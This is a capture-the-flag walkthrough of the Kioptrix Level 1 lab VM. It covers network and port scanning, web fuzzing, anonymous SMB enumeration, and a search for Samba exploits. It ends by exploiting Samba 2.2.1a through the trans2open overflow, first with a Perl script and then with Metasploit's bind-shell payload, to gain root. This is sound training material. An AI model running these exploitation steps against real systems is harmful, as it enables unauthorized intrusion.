kioptrix – level 1
Kioptrix Level 1 was created by @loneferret and is the first in the series of five. The description from the author is as follows:
“This Kioptrix VM Image are easy challenges. The object of the game is to acquire root access via any means possible (except actually hacking the VM server or player). The purpose of these games are to learn the basic tools and techniques in vulnerability assessment and exploitation. There are more ways then one to successfully complete the challenges.”
Sounds like a good quick challenge, so let’s get started with our usual netdiscover enumeration of the subnet and find our vulnerable host.
|
1 2 3 4 5 6 7 8 9 10 11 |
root@omerta-ctf:~# netdiscover -r 172.16.66.0/24 Currently scanning: Finished! | Screen View: Unique Hosts 3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180 _____________________________________________________________________________ IP At MAC Address Count Len MAC Vendor ----------------------------------------------------------------------------- 172.16.66.1 00:50:56:c0:00:13 01 060 VMWare, Inc. 172.16.66.136 00:0c:29:9a:ca:b8 01 060 VMware, Inc. 172.16.66.254 00:50:56:e7:28:06 01 060 VMWare, Inc. |
Target acquired. What ports do we have open?
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 |
root@omerta-ctf:~# nmap -sS -Pn -n --reason -O 172.16.66.136 Starting Nmap 6.47 ( http://nmap.org ) at 2015-01-26 15:03 EST Nmap scan report for 172.16.66.136 Host is up, received arp-response (0.00013s latency). Not shown: 994 closed ports Reason: 994 resets PORT STATE SERVICE REASON 22/tcp open ssh syn-ack 80/tcp open http syn-ack 111/tcp open rpcbind syn-ack 139/tcp open netbios-ssn syn-ack 443/tcp open https syn-ack 1024/tcp open kdm syn-ack MAC Address: 00:0C:29:9A:CA:B8 (VMware) Device type: general purpose Running: Linux 2.4.X OS CPE: cpe:/o:linux:linux_kernel:2.4 OS details: Linux 2.4.9 - 2.4.18 (likely embedded) Network Distance: 1 hop OS detection performed. Please report any incorrect results at http://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 2.13 seconds root@omerta-ctf:~# |
Port 80 and 443 are both available; the usual suspects I start interrogating. Unfortunately for us both services only present the default Apache post-install pages. For those of you that have been playing along with my previous Troll: 1 and Troll: 2 write-ups, you know what time it is. If you haven’t been playing along.. it’s wfuzz time!
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 |
root@omerta-ctf:~# wfuzz -c -z file,/usr/share/wfuzz/wordlist/general/big.txt --hc 404 http://172.16.66.136/FUZZ ******************************************************** * Wfuzz 2.0 - The Web Bruteforcer * ******************************************************** Target: http://172.16.66.136/FUZZ Payload type: file,/usr/share/wfuzz/wordlist/general/big.txt Total requests: 3036 ================================================================== ID Response Lines Word Chars Request ================================================================== 00584: C=403 10 L 29 W 272 Ch " - cgi-bin/" 01696: C=301 9 L 27 W 294 Ch " - manual" 02842: C=301 9 L 27 W 293 Ch " - usage" |
Okay.. nothing overly exciting there, but let’s take a look at the usage directory.
Nice, a Webalizer statistics page. Taking a look at what page or pages have been hit recently, we can see test.php looks popular. Let’s take a look at the page:
Pretty boring. Let’s keep enumerating through our ports. Next up, SMB on port 139. Let’s connect with smbclient, ascertain the version of Samba, and see if we can list any available shares.
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 |
root@omerta-ctf:~# smbclient -N -L 172.16.66.136 Anonymous login successful Domain=[MYGROUP] OS=[Unix] Server=[Samba 2.2.1a] Sharename Type Comment --------- ---- ------- IPC$ IPC IPC Service (Samba Server) ADMIN$ IPC IPC Service (Samba Server) Anonymous login successful Domain=[MYGROUP] OS=[Unix] Server=[Samba 2.2.1a] Server Comment --------- ------- KIOPTRIX Samba Server Workgroup Master --------- ------- MYGROUP KIOPTRIX WORKGROUP MINION |
Only the usual IPC$ and ADMIN$ shares. Next step, we check to see if the permissions happen to be weak, allowing us to connect to the shares. Alas, connecting to IPC$ failes with NT_STATUS_NETWORK_ACCESS_DENIED listing and ADMIN$ fails with NT_STATUS_WRONG_PASSWORD. Time to take a look at whether there are any vulnerabilities, and associated exploits, available with the Samba 2.2.1a version.
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 |
root@omerta-ctf:~# searchsploit samba remote 2.2 remote Description Path ------------------------------------------------------------------------- ------------------------- Samba 2.2.x Remote Root Buffer Overflow Exploit | /linux/remote/7.pl Samba 2.2.8 - Remote Root Exploit - sambal.c | /linux/remote/10.c Samba 2.2.8 (Bruteforce Method) Remote Root Exploit | /linux/remote/55.c Samba 2.2.0 - 2.2.8 - trans2open Overflow (OS X) | /osx/remote/9924.rb Samba 2.2.x - nttrans Overflow | /linux/remote/9936.rb Samba 2.2.2 - 2.2.6 nttrans Buffer Overflow | /linux/remote/16321.rb Samba 2.0.x/2.2 - Remote Arbitrary File Creation Vulnerability | /unix/remote/20968.txt Samba SMB 2.2.x | /unix/remote/22356.c Samba 2.2.x 'call_trans2open' Remote Buffer Overflow Vulnerability (1) | /unix/remote/22468.c Samba 2.2.x 'call_trans2open' Remote Buffer Overflow Vulnerability (2) | /unix/remote/22469.c Samba 2.2.x 'call_trans2open' Remote Buffer Overflow Vulnerability (3) | /unix/remote/22470.c Samba 2.2.x 'call_trans2open' Remote Buffer Overflow Vulnerability (4) | /unix/remote/22471.txt |
Nice… this looks promising. Luckily for me, I came across something very similar in a certification I recently achieved. Let’s take a look at the first exploit in our list, H D Moore’s trans2root.pl exploit of CVE-2003-0201.
|
1 2 3 4 5 |
root@omerta-ctf:~/oscp/scripts/linux# ./trans2root.pl -t linx86 -H 172.16.66.132 -h 172.16.66.136 -p 139 [*] Using target type: linx86 [*] Listener started on port 1981 [*] Starting brute force mode... [*] Return Address: 0xbf0001ffroot@omerta-ctf:~/oscp/scripts/linux# |
Damn. Looks like the exploit almost triggered, however we didn’t receive the expected reverse shell. Perhaps we could try a bind shell. Rather than spend the time altering H D Moore’s code, let’s take a look at the exploit available to us in Metasploit and set the payload to be a bind shell.
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 |
root@omerta-ctf:~/oscp/scripts/linux# msfconsole ______________________________________________________________________________ | | | METASPLOIT CYBER MISSILE COMMAND V4 | |______________________________________________________________________________| \ / / \ . / / x \ / / \ / + / \ + / / * / / / . / X / / X / ### / # % # / ### . / . / . * . / * + * ^ #### __ __ __ ####### __ __ __ #### #### / \ / \ / \ ########### / \ / \ / \ #### ################################################################################ ################################################################################ # WAVE 4 ######## SCORE 31337 ################################## HIGH FFFFFFFF # ################################################################################ http://metasploit.pro Love leveraging credentials? Check out bruteforcing in Metasploit Pro -- learn more on http://rapid7.com/metasploit =[ metasploit v4.10.0-2014082101 [core:4.10.0.pre.2014082101 api:1.0.0]] + -- --=[ 1339 exploits - 805 auxiliary - 228 post ] + -- --=[ 340 payloads - 35 encoders - 8 nops ] + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ] msf > use exploit/linux/samba/trans2open msf exploit(trans2open) > set rhost 172.16.66.136 msf exploit(trans2open) > set payload linux/x86/shell_bind_tcp msf exploit(trans2open) > exploit [*] Started bind handler [*] Trying return address 0xbffffdfc... [*] Trying return address 0xbffffcfc... [*] Trying return address 0xbffffbfc... [*] Trying return address 0xbffffafc... [*] Trying return address 0xbffff9fc... [*] Command shell session 1 opened (172.16.66.132:34434 -> 172.16.66.136:4444) at 2015-01-26 16:47:06 +1000 id uid=0(root) gid=0(root) groups=99(nobody) uname -a Linux kioptrix.level1 2.4.7-10 #1 Thu Sep 6 16:46:36 EDT 2001 i686 unknown |
Voila! As we suspected, the exploit worked and our payload allowed us to connect via a bind shell.
Thanks @loneferret for a quick and enjoyable vulnerable boot2root VM. I look forward to taking a look at your other Kioptrix challenges. As always, cheers VulnHub for hosting the VM and making this all possible.
Until next time, tight lines and may you pop shells often.